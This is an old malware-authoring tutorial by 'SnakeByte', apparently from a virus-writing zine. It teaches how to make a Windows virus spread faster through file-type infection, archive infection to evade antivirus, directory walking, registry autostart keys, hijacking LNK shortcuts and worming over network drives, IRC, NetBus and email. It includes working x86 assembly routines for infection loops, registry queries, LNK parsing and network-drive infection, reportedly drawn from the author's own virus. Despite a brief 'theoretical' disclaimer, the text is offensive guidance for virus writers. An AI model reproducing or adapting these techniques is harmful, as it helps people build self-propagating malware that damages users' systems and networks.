http://kickme.to/Cryptic/ fly.to/alpina Faster Spreading or What to include in your virus to make it spread more effective by SnakeByte [SnakeByte@kryptocrew.de] Here we go, please notice that it is illegal to spread viruses, and all this information is completely theoretical, or for testing purpouses in a controlled environment. I just wrote one Windows-Virus so you will see here just few lines of code.. ( interesting ones I think but maybe not very optimized ;) The task of a virus is to spread ( Payload is just a side-effect ). So we need some tricks ( besides infection *g* ) to make our virus spread, as fast as possible. Ok, when a virus arrives on a clean system, it will infect some files, sure .. ;) But if something went bad, we just get some files in the current directory and the victim deletes it, because he does not like the infected app.. :( Not very good, so what to do to avoid this situation ? Here are 6 ideas what we can do : 1.) Infect as many file-types as possible. 2.) Try to drop over archives 3.) Parse Directory's 4.) Use the Registry 5.) Follow Links 6.) Worming Ok, let's take a closer look at each of these methods: 1.) Infect as many file-types as possible. If you are macro coder, you should try to infect as many documents which support macro as possible ( DOC, CDR, DOT, PPT, XLS.. ). Same for the assembler coders, there are a lot of file formats which can be infected in Win32: PE-EXE, SCR (same as PE-EXE), DLL, HLP and VXD. Maybe you should try to code a hybrid which is able to infect Binaries on the one hand and macro on the other hand, this will offer you a much higher chance of finding files for infection. In VDat there is a description for how to infect most file types. I think adding 200-400 Bytes to your virus and being able to infect another type is a very good deal. The more files you infect the more likely you get your virus around. 2.) Try to drop over archives Nowadays nearly every file you download somewhere or get send by someone is zipped or packed with another archiver ( RAR, ACE ..) It is possible to infect the files in the archives too. It also offers you a small protection against AV programs, because AVP for example does not scan archives by default. Read Unknown Mnemonix Tutorials about archive infection for more information about how to do this. So if you infect an archive you archive two goals ( stupid sentence ;P ) the might not get detected, it is possible that someone uploads the archiv to a website and your virus get's lots of hits.. 3.) Parse Directory's Ok, now we infect a lot of files, but still all are in the same directory, so we need to change and parse directory's. What we should infect nearly always are the windows and the system directory's, cause they include a lot of files, which are highly used. Use the GetWindowsDirectory and GetSystemDirectory API's to retrieve their names. Then you should parse directory's to find more files to infect. Otherwise we would have infected the current, the win and sys directory, but nothing else, which is not very useful ( how often do you dcc a friend your calc.exe ? *g* ) There are two ways of directory parsing, the one is upwards the other downwards. If you travel downwards ( like cd.. in dos), you would normally not find a lot of files, so traveling upwards is recommended. This can be simply done with a FindFirstFile / FindNextFile Loop. The current directory is assumed to be root on one of the drives. The FindNextFileProc and FindFirstFileProc are procedures that call the matching API's ( I think you'll also use them several times ) The RandomNR procedure just generates a random number in dx. ************************ ParseFolder: call InfectCurDir ; infect the current directory cmp [ebp+InfCounter],0 ; check if we reached the number of files we want to infect jbe EndParsing ; we infected enoug ? ok, leave ! lea esi, [ebp+Folders] Call FindFirstFileProc inc eax jz EndParsing ; If there are no directorys we return dec eax ; otherwise we save the handle GetOtherDir: ; first of all we check if this ; is a valid directory mov eax, dword ptr [ebp+WFD_dwFileAttributes] and eax, 10h ; if not we get the next jz NoThisOne ; one lea esi, [ebp+WFD_szFileName] cmp byte ptr [esi], '.' ; we will not parse into . or .. je NoThisOne ; directorys call RandomNR ; generate a random Number, if it is 1 dec edx ; we infect the directory, otherwise ; we go on searching jz ParseNewDir ; we get this directory NoThisOne: call FindNextFileProc ; Find next directory test eax, eax jnz GetOtherDir EndParseDir2: ; we close the search - Handle mov eax, dword ptr [ebp+FindHandle] push eax call dword ptr [ebp+XFindClose] EndParsing: ; we just return ret ParseNewDir: ; we got a direcory, let's change to it ; and infect it.. *eg* ; close Find-Handle mov eax, dword ptr [ebp+FindHandle] push eax call dword ptr [ebp+XFindClose] ; set new directory lea esi, [ebp+WFD_szFileName] push esi call dword ptr [ebp+XSetCurrentDirectoryA] jmp ParseFolder ; parse it again ! Folders db '*.',0 ************************ 4.) Use the Registry The Windows Registry also offers us a lot of information about what files or directorys we should infect to be sure that our virus gets activated again and does not sleep inside some never used files. You need to load an additional DLL in your virus, but i think this is ok. If you can't load the DLL, just jmp over the registry routines and infect fewer files. I think you all know what the windows registry is or ? For those who don't: the registry replaces the old ini files which have been used in older versions of windows ( 3.1 ). The registry information is stored in the User.dat and System.dat. To view or change the registry use 'regedit.exe', which is delivered with every version of windows. The following API's are neseccairy to access the registry, they are all inside the ADVAPI32.DLL ! RegOpenKeyEx - Opens a registry key RegCloseKey - Closes an open key RegCreateKey - Creates a key RegEnumKeyEx - Enumerates subkeys RegQueryValueEx - Retrieves a value RegEnumValue - Enumerates values Ok, let's see some source how to get a value from registry : This little piece of code gets the Startmenue Folder ************************ lea esi, RegHandle push esi push 001F0000h ; complete access push 0h ; reserved lea esi, SubKey push esi push 80000003h ; HKEY_USERS call RegOpenKeyExA test eax, eax ; if we failed opening the key, we return jnz WeFailed ; let's get the value lea esi, BufferSize push esi lea esi, Buffer push esi lea esi, ValueType push esi ; Type of Value push 0 ; reserved lea esi, Value push esi ; ValueName mov eax, RegHandle push eax ; Reg-Key Handle call RegQueryValueExA mov eax, dword ptr [RegHandle] push eax call RegCloseKey WeFailed: ret SubKey db '.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0 Value db 'Start Menu',0 ValueType dd 0h ; Type of registry Value BufferSize dd 7Fh ; size of buffer Buffer db 7fh dup (0) ************************ Buw what can we use the registry for ? Ok let's see some interesting values : In these Keys are the autostarted files : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce Here are the paths of all installed apps, what about parsing this key ? ;) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths Several standard directories : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup Shared files ( infect them "two for the price of one" *g* ) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs Registered Help Files ( if your virus infects them, here you get a whole bunch of ) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help Computer Network Name ( nice value for slow poly ) HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\ComputerName\ComputerName A list of installed files (vxd, exe, dll, hlp, pif,.. ) : HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\InstalledFiles 5.) Follow Links Windows uses LNK-Files to create shortcuts for often used files, so you don't need to copy a 8 MB huge file to your desktop. If you find such a Link, you should check if it points to a file you are able to infect, if so.. don't wait and drop your code over it. Very useful becomes this if you parse the Start-Menue or the desktop *eg* Here is some example code from my Win32.DDoS how to do this, it does not work with NT-LNK Files :( There is also an API we can use for this, but I never figured it out, but I think this is not that much code, so we can include it. I assume you retrieved the LNK-File with the help of FindFirstFile / FindNextFile and the information is stored in the WIN32_FIND_DATA Structure, I also assume that the file is mapped and the base address in MapAddress. ************************ ; first of all, we check for the file ; mark, it is a single 'L' followed by a zero mov esi, dword ptr [ebp+MapAddress] cmp word ptr [esi], 'L' ; check for sign jne NoLNK ; if it is no LNK File we close it ; Let's make a check for the file-size, ; I don't think that there are any shortcuts ; bigger than 1 MB, just to be sure. cmp dword ptr [ebp+WFD_nFileSizeLow] , 0400h ja NoLNK ; get the start addy in esi, and and the size mov esi, dword ptr [ebp+MapAddress] mov ecx, dword ptr [ebp+WFD_nFileSizeLow] xor edx, edx add esi, ecx ; we start checking at the end of the file ; for a valid filename in it CheckLoop: cmp byte ptr [esi], 3ah ; we detect a filename by the 2 dots ( 3ah = : ) jne LNKSearch ; in the Drive ; for example C:\whatever\blah.exe ; we search for the ':' inc edx ; there are 2 times 2 dots, when checking from cmp edx, 2d ; the end of the LNK, we need the 2.nd je PointsDetected ; the first : is inside the path ( without filename ) ; so we skip them LNKSearch: ; go on searching dec esi ; we search until we found the dots or loop CheckLoop ; searched the entire file ( size in ecx ) ; I don't want to create a SEH .. ;) ; if we end here, we did not find the two dots.. :( NoLNK: ret ; return to search more files... PointsDetected: ; we found the drive ( two dots ... *g* ) ; esi points to them, now we need to check ; the name.. cmp byte ptr [esi+1], 0h ; check if we got an entire path or just a je NoLNK ; single drive ; this can happen sometimes with NT or 2k ; shortcut files, so we better avoid them PointsDetected2: ; now we search the starting point of the name dec esi ; by searching for a zero cmp byte ptr [esi], 0h je NameDetected loop PointsDetected2 ; ecx still takes care, that we don't ; search too far.. jmp NoLNK ; nothing found ? return.. NameDetected: ; ok, esi points now to the name of the file inc esi ; you can now open this file and check if it is ; something you are able to infect ; it's just that easy, but very effective, if you ; do this in the right folders,.. ;) ************************ 6.) Worming To make sure you don't stay on a single computer you should try to spread over networks. One way are IRC-Worms, which sends your virus to other chatting people. To my mind this is the easiest way to worm around. Another way is to check all drives and if you have access to a network drive, infect there some files. ************************ push offset Buffer ; offset of the buffer push 60h ; buffer-lenght call GetLogicalDriveStrings cmp eax, 0 ; did we fail ? je StopThis lea esi, Buffer WhatDrive: push esi call GetDriveType cmp eax, DRIVE_REMOTE ; we got a network drive jne NoNetwork ; esi still contains the offset of ; the root dir on the drive call infectDrive ; so we infect it.. ;P NoNetwork: Call GetNextZero ; place esi after the next zero ; ( searching from esi onwards ) cmp byte ptr [esi],0 jne WhatDrive ; if we searched all drives we ; end here, otherwise we check the type StopThis: ret Buffer db 60h dup (?) ; I don't know that many ppl with 20+ ; Drives so this buffersize should be ; big enough ;) ************************ Another way is, like the 911-Dialer does, to scan IP ranges when the user is online for non-pass protected Netbus PC's. If you have access, just upload your virus ;) Finally, you can worm with the help of E-Mails, infect a program and send it with the help of Visual Basic Script or with the MAPI Commands around. This is maybe the fastest and most efficient way of spreading, cause the snowball effect is very huge. But if you use VBS and Outlook, please keep in mind that it is worse enough that your virus just spreads in one OS, if it also relies on two frontends ( OE and VB Scripting Host ) it becomes even worse ;) Hope this little text helps at least some peoples, I enjoyed writing it, and hope you do so too while reading it... ;) cu SnakeByte